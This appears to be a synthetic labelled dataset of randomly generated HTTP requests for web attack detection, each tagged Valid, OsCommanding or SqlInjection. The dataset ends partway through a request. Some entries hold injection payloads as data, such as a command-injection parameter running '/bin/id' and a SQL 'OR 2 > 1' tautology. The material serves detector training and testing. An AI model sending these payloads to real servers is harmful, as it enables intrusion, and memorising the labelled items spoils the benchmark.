Accept-Encoding: deflate, identity;q=0.4, deflate;q=0.4
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 82.11.164.48
Cookie: uk=5609;29Wxmlhboot.ini1zZRN0=0972938;rneuaabfie=9057561;io=631;cl7oDyuoNh=24313640;ro2y2eysiya=lomWTmm2OL
Cookie2: $Version="892"
Date: Wed, 04 Nov 09 08:18:22 UTC
ETag: "-GBFB31@3XhwLPb8"
Expect: sedSesgd=Bbhat;lrgk=cTNth
From: nysnc@tRhdi.ch
If-Modified-Since: Wed, 12 Apr 06 03:25:36 GMT
If-Unmodified-Since: Thu, 07 Dec 06 03:06:50 GMT
If-Match: *
If-None-Match: "-7jd9S3ncMdRa2QjQ-U"
If-Range: *
Max-Forwards: 2
MIME-Version: 1.2
Pragma: a1='l9b'
Proxy-Authorization: Digest nc=3A5E1cB7
Authorization: NTLM ZW5yeEVpdWtsZW9wcnR0VXRueE9pY3RzeWVkaGpkRGU=
Range: 952084-,602699-3805,26-421
Referer: http://www.rowe.org/gseiwt/di3s2e.bin
TE: gzip
Trailer: Referer
User-Agent: Mozilla/7.7 (X11; U; Open BSD i386 3.3; is-lo; rv:8.7.4) Gecko/86432182
UA-CPU: Sparc
UA-Disp: 3488,5746,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 320x815
Via: 3.6 1.70.201.92:70396, 4.3 213.113.137.192, eel/3.5 153.146.44.4
Transfer-Encoding: identity
Upgrade: arx0t/5.9, nloymn/5.4
Warning: 953 85.108.253.61 "sa7gxeiapkth" 
X-Forwarded-For: 71.26.127.147
X-Serial-Number: 000247675001573730
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32168
Start - Id: 36747
class: OsCommanding
GET /i.MRm@j_mKdIE/nodn2tlitttHomsk/eymkr78RQD8ko5JqM/neodgs6tvn3/azkqkym1CXbigMuC_Ynr/irnfdIyZTggezA/notfewe.tiff?NqNT=54619394&QqfzNebE5JX=tfY%40dR&0documentVcXN-=5924348&wgobisgS=64&oetdl=ao7l&leA=trtJ-&0window.openbbetweenY7=%5C%3B+++++%5C%2Fbin%5C%2Fid++++%3B&osvire8xble3=deeLr&itua=nphpyao0nnehe&wni3nlarbste8=ehuyn6s&qnna1t=50009 HTTP/1.1
Host: 213.185.19.98:5
Connection: reuizb
Accept: audio/*;q=0.0
Accept-Charset: cp-932;q=0.0, macintosh, utf-8, iso-8859-4;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 66.186.73.243
Cookie: etdrezmAa=stS>4t8?=todNdte;tu1ir6fs2=o9HvcfQh
Cookie2: $Version="34"
Date: Tue, 29 Jun 04 12:51:00 CET
ETag: "OSxgv6GwIp@.QEtxE"
Expect: iuowlu=arrod;at3irEyt=cnoiy
From: 9rrtotci@rtshul.org
If-Modified-Since: Fri, 12 Nov 04 21:54:38 CET
If-Unmodified-Since: Mon, 12 Oct 09 17:28:32 UTC
If-Match: *
If-None-Match: "whlAbR@ZXAo_LZWA79"
If-Range: Sat, 03 Apr 10 16:44:27 GMT
Max-Forwards: 2722
MIME-Version: 5.1
Pragma: ov5mzs='hhrnlA'
Proxy-Authorization: ttsg7i nehfeHuT=4aeyn
Authorization: NTLM anpOaW5paGdldGVKdW44bHNzdGViYWFudXVhTmJPcnJheWVxOWU=
Range: 50-7
Referer: http://www.aGeehemt.uk/NmvaEYr/nloE8/gaargiu5.php4
TE: deflate;q=0.3,gzip,trailers
Trailer: From
User-Agent: oie7rnb30/1.0
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 232x1783
Via: 5.6 48.185.186.79, 4.2 www.ainc.jpeg
Transfer-Encoding: deflate
Upgrade: qpu/3.7
Warning: 603 www.nelar.css "fseup" "Fri, 11 Nov 05 23:14:00 GMT"
X-Forwarded-For: 4.110.8.55
X-Serial-Number: 51873709956197
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36747
Start - Id: 18148
class: Valid
GET /9kcFcrsa/mKt3lLmgwqYFLHKy/b-CGnW5-0ZwXLY_J6b8/8K@5JVSbetween.bin?b1=tsn&soLenflnrseth=arrs4&oyr=ih9eehtl+replace%3AcAels&c5nmogvwfeuibsd=yo&ot=tmp54&Oao=orco3aciatme&v0s4sefltlgnE=group+byu2&tcdcie=4166051538 HTTP/1.0
Host: www.hPXuttto0.it
Connection: close
Accept: audio/*;q=0.7, image/png, image/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: lddDtt=up0manr
Client-ip: 165.189.39.9
Cookie: 5neuee=&h
Cookie2: $Version="51"
Date: Sat, 20 Nov 04 06:42:22 UTC
ETag: "gW6h5Ede4rT02c.7Hzc"
Expect: i0e3c=tmaTard;aean
From: espenT@te4e.biz
If-Modified-Since: Mon, 29 Nov 04 11:48:23 CET
If-Unmodified-Since: Fri, 17 Apr 09 11:19:02 UTC
If-Match: *
If-None-Match: *
If-Range: "u7GM7tU8iGoO0rVQ"
Max-Forwards: 4559
MIME-Version: 0.4
Pragma: eNlml=honm
Proxy-Authorization: mNGer GSteia=isijnsh
Authorization: 542k 9fhocl=b2t4rce
Range: -69064,75-37,650952-
Referer: /2mhhr4w/nsdsf/ehrw.sh
TE: trailers,deflate,trailers
Trailer: If-Range
User-Agent: dcfhfHirls/9.2.8
UA-CPU: PowerPC
UA-Disp: 2033,9785,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3922x0648
Via: 1.2 153.81.158.40, FTP/8.4 248.102.134.38, 3.6 29.172.47.35
Transfer-Encoding: compress
Upgrade: receba/6.4, n0ete/3.0, 8dtoRs/5.6, voa/4.8
Warning: 209 www.se8n4i2.jpeg:54 "geLngmEscrtdtorher" "Sat, 15 Sep 07 18:14:44 UTC"
X-Forwarded-For: 47.138.63.112
X-Serial-Number: 21129432693089718
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18148
Start - Id: 13917
class: Valid
GET /oEwIbjahhe5bi1/r4qsnLbaT60oauArqo/ehoi/d.35UdXTePcY/bizSmI4likejvF@Fi/WsystemuKIPKV1tRgZ/onysYf6rqpAKtNT6wiay/BZAg0@Uwherehttps5CxhmB.php?frEmdE=heot%3A&ZXx.xuIMlog=nthrincludeP&m5vtenoMinbtNo=4&liFFrZ7=ioltt&a2reBopsau=tHW&eej=nf&inaoo=2028335&me2u=pme%24szstscripttcmdnee%3A%2Boosu&tev9g7ela=e%40squ5fs8v&8ciaaqzdmE=+hdo-t HTTP/1.1
Host: www.hmalnde.org:80
Connection: eyenr
Accept: */*
Accept-Charset: x-mac-roman;q=0.9, iso-8859-4, euc-jp;q=0.6, shift_jis;q=0.5
Accept-Encoding: *
Accept-Language: ctasen-g, tiEo-lamtfgga;q=0.3, ht1EN-poK;q=0.6
Cache-Control: no-transform
Client-ip: 179.61.107.5
Cookie: trdevgiroeemtse=[vT8tsfthome;iuhahiac46=n9ofT;lUM4e8VT=autoexecct8leservicest<os;rt65u=irrniddehedeleeeCn
Cookie2: $Version="89"
Date: Tue, 05 Oct 04 19:29:50 CET
ETag: W/"muZ3M0xNyL6U2wg4"
Expect: 100-continue
From: mshmtny@eieiosii.fr
If-Modified-Since: Sun, 08 May 05 06:14:18 GMT
If-Unmodified-Since: Sat, 22 Nov 08 24:46:52 UTC
If-Match: *
If-None-Match: "oX2en8qxKmOQRVycM6F"
If-Range: Wed, 13 Aug 08 07:36:19 GMT
Max-Forwards: 73
MIME-Version: 0.9
Pragma: b=r
Proxy-Authorization: Digest response="20C90f08eaa20Ae6068cffEEf4e0aDbb"
Authorization: NTLM b3hTZk1laW5uZWtOdnJFTGFnaGRybEFuYThoYWFMb2NuYWlsdmFEaGVubg==
Range: 868-9,0-
Referer: /snaLh/euoehbEc/tdnionua.php
TE: gzip;q=0.3,deflate;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: pUNtlkeciso
UA-CPU: Sparc
UA-Disp: 215,5211,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7739x7906
Via: FTP/9.2 www.edoN.html
Transfer-Encoding: compress
Upgrade: esfn/9.6, thco/2.9, hta/6.2, 8oehif/3.6, mosy/1.1
Warning: 813 152.30.192.175 "oqazlfoqQirrrtqe" "Mon, 31 Oct 05 07:13:42 GMT"
X-Forwarded-For: 144.135.40.157
X-Serial-Number: 023229886351818841
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13917
Start - Id: 5935
class: Valid
PUT /5Abm6ihd0JdetXv9d_t/xdIuY@c6lCxuQ/eGE/n5s1SD4R_oxi0NU/eIqa/ClqhF3o8airseeungse/n_zKAq0FePtwTyjKXw/soageeu5/sES0MO/bnrlwwts/rw.cgi? HTTP/1.1
Content-Length: 200
Content-Language: v,viw0
Content-Encoding: compress
Content-Location: http://www.asedaor.net/ntui6/v6tBs/1yta0nse/a0as1ge.gif
Content-MD5: M3Rlb2llaW5IbXRsZTZ0dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Jan 05 08:37:06 UTC
Last-Modified: Thu, 05 Feb 04 08:18:19 CET
Host: www.hsouei.org:71
Connection: eSet
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: stgtou-bnN;q=0.6, 2-td, seuyn-njfetR;q=0.8, r1en-eana, kndye-eutapt
Cache-Control: max-age=2657
Client-ip: 182.209.58.87
Cookie: nph-styleXu0paccepty=sock_streamo5Hidsia;b9EoearrdiooaCc=MMri66ie6mmoaiMiry;JT7r=to?la;iZbhoRnetscqera=888;aol9iqB=5032
Cookie2: $Version="421"
Date: Sun, 12 Dec 04 01:12:13 GMT
ETag: W/"gNhmbmq4d4UV0ps1d5"
Expect: 100-continue
From: 5bmY@sulrfr.de
If-Modified-Since: Sun, 23 Apr 06 12:50:05 UTC
If-Unmodified-Since: Wed, 26 Mar 08 11:34:46 CET
If-Match: "r6UqtBRkDHLN29K"
If-None-Match: "92oqILA6XWSF1TfZ-"
If-Range: "dTl2gQhlGd9mRpXQhRmv"
Max-Forwards: 435
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM c2FUWm9rZXd1aG4wZnFhaWVpaGxjNnRlc1Jzc2VUbTZldnR6
Range: 1731-
Referer: http://i4sasr.uk/Iai0se/rpp8Faao/Igoaofe.tiff
TE: trailers
Trailer: Range
User-Agent: Mozilla/2.2 (compatible; guc1onoott; Unix; 49oe; neaoiyicl; E3ttnuwn)
UA-CPU: PowerPC
UA-Disp: 0927,7062,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 5099x0189
Via: FTP/0.0 100.195.87.46
Transfer-Encoding: deflate
Upgrade: diomed/1.4
Warning: 330 www.oi0dn.tiff "tmtnEiIsh8entLDrTl" "Tue, 16 Aug 05 14:24:45 GMT"
X-Forwarded-For: 81.125.98.15
X-Serial-Number: 235537183752
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nnaU=08917&eeedepbteti0=utrbhvcaoaHd&Ny4uu=waCtspto5et4pc&eotsnir=drops1@t&ee1feo=3&iw3Safaet=icio2eQ&mhbViiodCo0el=  ag&6lrolasndEtH=I1suerisduda1h&1fN8nlhan=rh4sNlbn&abdkEoATRhess=8nh&ndhdIshtin=a

End - Id: 5935
Start - Id: 4151
class: Valid
PUT /bkXLchildsunionk.8madmin.html? HTTP/1.0
Content-Length: 159
Content-Language: mHgEd
Content-Encoding: deflate
Content-Location: http://www.o8oifaen.org/btsn/Ari3aeo/bEdenyoi/aIbie.shtml
Content-MD5: dG5xdXlid3RjOGJuOEVvYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 Jan 06 12:27:40 CET
Last-Modified: Thu, 23 Sep 04 23:24:26 GMT
Host: 230.13.38.38
Connection: sb82
Accept: */*;q=0.3
Accept-Charset: x-mac-japanese, iso-8859-9;q=0.1, iso-8859-3, cp-936
Accept-Encoding: 
Accept-Language: ta-L;q=0.0, h5e-EarcgE, N56oyo-aLei, sExidhee-1rNehe0i, 8eyvo-t46nlrn;q=0.0
Cache-Control: only-if-cached
Client-ip: 224.142.228.209
Cookie: sdehc1r=u7a;fabt0befsr=an y v$
Cookie2: $Version="42"
Date: Mon, 30 May 05 02:32:48 CET
ETag: W/"2C_Qw18CRg16zFmEoJ"
Expect: cads
From: Cfmatoy@rdbndch0ft.fr
If-Modified-Since: Mon, 29 Jan 07 03:23:19 UTC
If-Unmodified-Since: Sat, 18 Nov 06 07:04:43 UTC
If-Match: *
If-None-Match: "yM4.rXFWRtRacMoLx9"
If-Range: Tue, 26 Jul 05 01:45:39 GMT
Max-Forwards: 479
MIME-Version: 5.0
Pragma: ed5rnne=1Smie
Proxy-Authorization: iukat7 awprvoKe=hcsdr
Authorization: 9Aoga fiYg=y4oest
Range: -9,-905
Referer: http://www.hquiodt.be/yvssed/nnaea.jpg
TE: trailers,gzip;q=0.0,trailers
Trailer: Proxy-Authorization
User-Agent: ro7reg9al (aeVEYu.; a2@sAY_oC; aMj1V9HorG; md@nX@Z; iqG4W@jj8p)
UA-CPU: x86
UA-Disp: 192,906,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 872x878
Via: 6.5 28.192.166.144, 8.6 62.171.155.138
Transfer-Encoding: compress
Upgrade: usCo/8.5, i9eno/9.6
Warning: 964 157.74.94.185 "addaltysTi7tiham" 
X-Forwarded-For: 145.209.171.178
X-Serial-Number: 5833814723
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

u2=t;a6r0Bo Sot[?2feE&oq=slt~Seterrb 6s&ui-r=:e Ochm)e&taiOywlaxierB=ti9c&mnEn8o4=74029&cr6ne=8498&betrtx=e\iexec d26bnizb&anartHa7sixsNsh=rcpetl

End - Id: 4151
Start - Id: 25173
class: Valid
GET /inputB0BVzArW8Ezu6x/dQHp2-d@Wg/sn/hThUeFlNenEa62/uphpUJ/sHWrx/tOTahrc/dss/nr8ri/h21yKi7/E8tsehhlriim5igRt.shtml?we=wjf8-iWn5W&pognhgmcih=%3A8body&4tio=hllI5inzi&eossrbedoa=1936063688&y1r=Etij&nhnqsmecRe8ep=7apassthru&Lt_IY=%3Bla+heuaroe&haypeunlr=reapassthruchildtge&cmunpadwss=5 HTTP/1.0
Host: 6.172.228.139
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, identity;q=0.2, identity
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 56.216.77.220
Cookie: KIX3Eks.X5=5628;phoemhnoenaioqg=33
Cookie2: $Version="64"
Date: Thu, 17 Aug 06 07:52:46 CET
ETag: W/"hAqlYd2Sq6tOVY8lO"
Expect: 100-continue
From: t6e6@olsywdnTj.it
If-Modified-Since: Mon, 15 Feb 10 23:46:08 UTC
If-Unmodified-Since: Mon, 23 Feb 04 17:24:07 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 10 Oct 05 11:30:28 UTC
Max-Forwards: 1
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM eHVjMWU5b2lodGVzdG9Jd1R6Zm9kbW5paGgyck9hRTc=
Authorization: 9eeo thzsm=tpkn
Range: 018504-,8-57952,64508-1
Referer: /zeu1dagA/poazth/cooehn/wneyotit.txt
TE: deflate
Trailer: Via
User-Agent: Mozilla/6.7 (Machintosh; U; Mac OS X 2.4; se-dc; rv:8.6.5) Gecko/09768888
UA-CPU: Sparc
UA-Disp: 550,936,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5457x802
Via: FTP/3.4 117.224.122.11, steoo/7.4 www.enbi.jpeg:7833
Transfer-Encoding: deflate
Upgrade: tIis/4.6
Warning: 990 www.zeUie.gif:1795 "laccseebgaehngfutko" "Mon, 16 Oct 06 20:55:34 UTC"
X-Forwarded-For: 54.93.72.103
X-Serial-Number: 39906730696975900354
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25173
Start - Id: 18464
class: Valid
GET /h1qLyOX66wv/iV_@Riu9qrl/o5otM7ihit/alo3t88Tord2d3mbm83u/e4re1SNerl8tMAsttq/deleteqand6E/lf/ic1i4e/7ikmn9rd/HJ/em4QqEErSi@hXJ/dui.htm?t4=4iES4nstylenns&1rLAe3lEiRN=emVtXTC.v4JZ&40aI=0&auuerokksrz8=0dS%27c8&treits=9431487&ilEhitEehninTe=aunn-++Fre%40oni6M&nu1=%27sl7tzDt HTTP/1.0
Host: 169.213.128.113:4
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-korean;q=0.8, iso-8859-1, x-mac-arabic;q=0.0, windows-1253;q=0.1
Accept-Encoding: compress;q=0.7, deflate, deflate;q=0.6, identity;q=0.9, gzip;q=0.0
Accept-Language: ti1o8a-eej, hitf-o9h1et19, lhachogt-dssmsed;q=0.8, e-yPj;q=0.1
Cache-Control: max-stale=121
Client-ip: 223.195.59.109
Cookie: R3Rkclsihieist=3LOQ;tbzatee=57;rmaiossdkcTuO=57;1nacnr0eh=55507248;iiusrh5wz=ttgterwetiusn
Cookie2: $Version="6"
Date: Tue, 31 Jul 07 14:16:19 CET
ETag: W/"sUt9QeNx4z1GOOplf"
Expect: 100-continue
From: tgrartc0@enmrneaz9.org
If-Modified-Since: Wed, 04 Mar 09 10:08:17 UTC
If-Unmodified-Since: Mon, 05 Jan 09 12:08:33 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 658
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: mdtspE NmaFtM=lagctp
Authorization: NTLM bnU0bHR0UHQ1bjNjSW93YXJOZXRvb2VFaXdxaWFpdTRoZXdlbGI=
Range: 72-79
Referer: http://cue7a3a2.net/votsrg/mht5nfoe/oeel.msf
TE: trailers,trailers
Trailer: Via
User-Agent: Rotlhq1tn9/1.3.9
UA-CPU: PowerPC
UA-Disp: 454,2139,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 934x751
Via: g0eN/9.3 224.175.144.214
Transfer-Encoding: compress
Upgrade: jjVu/1.4, en9dee/2.3, sndr3s/2.5
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 110.33.123.65
X-Serial-Number: 63866719
----: -------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 18464
Start - Id: 16846
class: Valid
GET /Lh@kjMb/dmTQ2/tWyem/IdvQi9xterm2YpZ/iHhA8I3HV91tG2M.jpg?rcc=Tm5shstdin%7Eniin&bexotratlf=tshutdownhtpassshutdown&rhtxeps3oUsmstn=restsiiNvinOne&weoAlt=6h&ln1=74946865&QStmpSGFhR-d9M=%7Cnvr&urteosoiptsa=45638&otgnEsiterw=ode&qyn62DlDsbOh=eicts6atmonae&7u47rcpfvn=2533&wUSautoexecBKstdinvbscript5LY=7eds&sglv3Oaoeete=+oaelVtdcd%3Avomceah HTTP/1.0
Host: www.8lenneenb.gov
Connection: rbeirAbp
Accept: application/*;q=0.8
Accept-Charset: windows-1255;q=0.6, euc-cn;q=0.9, x-mac-chinesetrad, iso-8859-7;q=0.7, iso-8859-15;q=0.2
Accept-Encoding: gzip
Accept-Language: tdQee4ed-Nofttd, nns-M5;q=0.0, n-tgt, chcLyepl-na;q=0.7
Cache-Control: no-transform
Client-ip: 164.171.117.126
Cookie: orcoba4dce=421;os3o=lfaes1Ni5onmfrdth;esHeullh=2d bl-tlOrio0rt;uiloleetaM=t71ey
Cookie2: $Version="853"
Date: Thu, 23 Sep 04 06:28:16 UTC
ETag: "eOSrYC3A0SBrq3b6zkC"
Expect: oeTen
From: sad4d0o@e9nnxnucoh.be
If-Modified-Since: Tue, 23 Nov 04 10:37:17 CET
If-Unmodified-Since: Fri, 01 Dec 06 17:47:55 UTC
If-Match: *
If-None-Match: "7dmelCWgLYe1LV0Zha"
If-Range: Fri, 20 Apr 07 01:14:42 UTC
Max-Forwards: 636
MIME-Version: 1.2
Pragma: b='ima'
Proxy-Authorization: Basic cHNjaWVyZXE6ZWlvY24=
Authorization: Digest nc=5dFfD8B6
Range: 976166-09743,687-149662,4-
Referer: http://hFthlns.net/esrogCi/hluiY/rtss/nNahobr/zttslN5.bin
TE: deflate,gzip;q=0.3,trailers
Trailer: If-Range
User-Agent: Mozilla/2.2 (compatible; MSIE 8.2; WinNT; wrs5; eenditqd)
UA-CPU: Sparc
UA-Disp: 952,004,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 818x5345
Via: hhh/7.4 167.224.50.149:57, 6.3 120.67.59.244, HTTP/1.9 www.ujreR.css
Transfer-Encoding: nat1; iIad=nl6rtih
Upgrade: IDaaec/9.5, tkiame/5.5
Warning: 175 www.72ntce.js "kngnaee" 
X-Forwarded-For: 244.9.245.19
X-Serial-Number: 926077
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16846
Start - Id: 20912
class: Valid
GET /orEDuqei.tiff?t5rc=480194&reaoee5t=otexeisnren9wte7l&lrhtm=529&g7atarnd=a&ttotbth=sNuba&cn9e4xc=stnt&ytl0wsshutdownzFupdatePm=78748015&Ws4iero=3516924&C5tsresaIhe=72747203&rhvwbe=17407351&mrdt8aTd=A%26o3e&uern=w+divr%3BawmqpaL&bSttbisi=rsieihvpwh71in&u7agmmiot=75284395&lssR4=78234 HTTP/1.1
Host: www.sevhepluy.cz:80
Connection: qenceb
Accept: */*;q=0.9
Accept-Charset: euc-jp;q=0.2, ks_c_5601-1987;q=0.3, koi8-r, iso-2022-kr;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 47.98.27.45
Cookie: llijrPtweu=s1;w8n4tbs=aceoeaalloTouscripteo;ia=3u;wi5abhHsrp=0205821335;eaeAdxe=Uaccept
Cookie2: $Version="9"
Date: Sun, 09 Apr 06 06:01:26 UTC
ETag: W/"UCpraVfCtd0pS96L4"
Expect: e3nio=aeanEo;1io5iao=h9l6O
From: thieLh@bEdxsci.biz
If-Modified-Since: Thu, 12 May 05 04:29:34 GMT
If-Unmodified-Since: Tue, 20 Nov 07 17:16:01 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 04 Aug 06 20:22:58 GMT
Max-Forwards: 58
MIME-Version: 6.8
Pragma: t=e
Proxy-Authorization: 5lee isw1q=euaaW
Authorization: Basic c2NlazpkZ2NvamZ4
Range: -250161,-344,295278-511
Referer: http://anOai.fr/r1choNm.swf
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.4 (X11; U; Open BSD i386 5.3; st-ib; rv:2.5.6) Gecko/03210483
UA-CPU: 68000
UA-Disp: 743,400,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4129x627
Via: vqt/6.0 www.usgo.shtml
Transfer-Encoding: compress
Upgrade: neaxe/1.5
Warning: 524 www.ihrn.jpeg "0rnvrpiinz" "Wed, 08 Apr 09 02:51:11 UTC"
X-Forwarded-For: 186.72.20.98
X-Serial-Number: 8671982338196
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20912
Start - Id: 18923
class: Valid
GET /Hivryeaoada3rsyr/pgnhbfwciaw/tea5diEtiheaneprn/rLA4qBxHEgrQn6jFeubL/hfQQO/cee6tabbnnTnvmiuun/ehs3zcdbAAyu0hr.php4?ayo8ao57ye=315666&KFwidX=ettn&waRdwm=415937904&siaJiarenyosTl=uib%2Bromi%3Crg&mrw3eotroho=p5ot HTTP/1.0
Host: 119.184.66.219
Connection: dhhmgr
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=25
Client-ip: 179.157.5.79
Cookie: nrrtcdusi=904227;th2eetwddppSps=96382;edes=ts@;XZCnodelMnE9=sel;dllc=nlyldrEos3;agodneSnt=e.AUvfIffAp
Cookie2: $Version="06"
Date: Tue, 18 Dec 07 18:54:58 UTC
ETag: W/"su.O@LDx_sPJFRT9"
Expect: oetsEour
From: eb4jab@1o2nqwlt8.biz
If-Modified-Since: Sun, 30 Jan 05 10:33:40 GMT
If-Unmodified-Since: Sun, 01 Oct 06 14:23:50 UTC
If-Match: *
If-None-Match: "nyRL.kacuuQGtFem"
If-Range: Fri, 11 Jan 08 06:32:32 CET
Max-Forwards: 822
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM bWhlOHNhZmdlbmV0YW90eGVkaW9zajRoYm5Jbnk3YUs1cnQ=
Range: -69
Referer: /hgte.gif
TE: gzip;q=0.5
Trailer: If-Match
User-Agent: cTios5bot/8.5.2
UA-CPU: Sparc
UA-Disp: 3019,5920,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 905x897
Via: FTP/9.4 250.146.17.227, FTP/1.1 www.ahra.jpeg, FTP/6.3 www.eTnf.html
Transfer-Encoding: deflate
Upgrade: ensdmo/4.9, 8gvNs/8.5, evntyz/9.1, 7nshfi/4.0
Warning: 206 www.rcar.js "iacalyetteu3rehb" "Sat, 27 May 06 22:33:16 GMT"
X-Forwarded-For: 85.156.7.96
X-Serial-Number: 27260320301
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18923
Start - Id: 30539
class: Valid
GET /ezeT8c1/5R/.tl4SqSfp4adelete2pd/cl7LX/yIomAAYJ_pN@.tiff?nti1obrnr=ly2edng&5edgk80lh=biioi%28tbjrp&yfnuodeqnervheT=sEnovmajepehr&l2ttf5w9Bgeabps=amxehq&ofai=neinsertei&HpUi=5 HTTP/1.0
Host: 84.106.149.69
Connection: sas8Erw
Accept: audio/*;q=0.2, application/*
Accept-Charset: x-mac-arabic;q=0.4, windows-1257;q=0.6, x-mac-turkish;q=0.1, x-mac-greek;q=0.9
Accept-Encoding: gzip;q=0.3
Accept-Language: g0-Ahes6TwS;q=0.0, deai-z6, c-glnn, 8nRe-o0ib0tee, s-aeon
Cache-Control: no-transform
Client-ip: 252.240.130.193
Cookie: waumiiS=dx/a
Cookie2: $Version="3"
Date: Thu, 07 Jul 05 22:36:26 UTC
ETag: "meAkYDcqhBNlFttzFe"
Expect: 100-continue
From: fulner@n7m8d5nmt.de
If-Modified-Since: Tue, 17 Jul 07 20:38:05 GMT
If-Unmodified-Since: Tue, 10 Nov 09 16:55:55 UTC
If-Match: *
If-None-Match: "oHAm8DCnkFcEkb_cihbk"
If-Range: Thu, 05 Oct 06 11:44:53 GMT
Max-Forwards: 5
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: NTLM cGFseXRkbGE4c3VvYWhpbzVheW1zb0tFaWVlbnh0dHRkcGJlVW10M3QxbGhlZQ==
Authorization: Digest uri=http://ilte.de/6r9ng.pdf
Range: -47,-9645,79-6262
Referer: http://www.hbpz3o.fr/ieap/eTlr04ll/omrritr/dsusga.wmn
TE: chunked;q=0.5,gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: Mozilla/4.5 (Machintosh; U; PPC 9.5; rs-lS; rv:1.3.5) Gecko/19888133
UA-CPU: 68000
UA-Disp: 9253,211,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 848x9139
Via: FTP/5.8 www.Sqszetw.shtml, FTP/8.8 www.nsnw.htm, Oari/8.0 75.128.206.238
Transfer-Encoding: compress
Upgrade: psezsR/2.5, pzmc/6.5
Warning: 671 140.154.212.102 "5oe5aeyToglnofojo" "Thu, 27 Mar 08 22:18:58 GMT"
X-Forwarded-For: 175.103.25.65
X-Serial-Number: 60141
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30539
Start - Id: 42179
class: SqlInjection
GET /G4QVlBDechoMC7hbGx/8pkJsSKu.node/mi4nd.png?In=1cmii&zaoyu6anftsds=20&eleoeeumtoae=6ab&sW=uH%40d3&eryed=++OR++2++%3E++++1&hrnmtGqrMcae=dt&tuyetD6efhaeT=ecpV.&PZd2weg=81503372&wulyaees3ebecA=butabdisor&zbYZGwWAL=tsroAe2 HTTP/1.1
Host: 3.199.139.233
Connection: coosa0
Accept: image/jpeg, application/*, video/quicktime;q=0.6
Accept-Charset: iso-8859-1, iso-8859-1;q=0.9, koi8-r, x-mac-ce;q=0.6, iso-8859-2;q=0.8
Accept-Encoding: compress, identity;q=0.9, compress
Accept-Language: *
Cache-Control: stire='5uo'
Client-ip: 171.126.113.10
Cookie: oeto1a=ctlu3rldhft;@2bC9K2r=08411217
Cookie2: $Version="85"
Date: Thu, 28 May 09 15:29:31 UTC
ETag: W/"NGLysbC8Lx4iZGnoq6"
Expect: 100-continue
From: hmrl@wdteioa4s.uk
If-Modified-Since: Sun, 22 May 05 22:08:11 UTC
If-Unmodified-Since: Thu, 05 May 05 17:06:57 GMT
If-Match: "boYIb4i8MsFnDmJd_V"
If-None-Match: "2H3y0Q_oN_0.Ij3xIz"
If-Range: Sun, 04 Jul 04 05:28:37 UTC
Max-Forwards: 049
MIME-Version: 5.3
Pragma: ULst=nh
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: NTLM eWlzeU9ldWd0OWNub2ptaGRveWVzNXRod3RoYXRub0hUb2xsQU1paGNpcw==
Range: 1010-
Referer: http://blueanb.uk/6ohng/eo2oyN/htfwoaa/omfeo9cp/itj6Id.cfm
TE: trailers,trailers,trailers
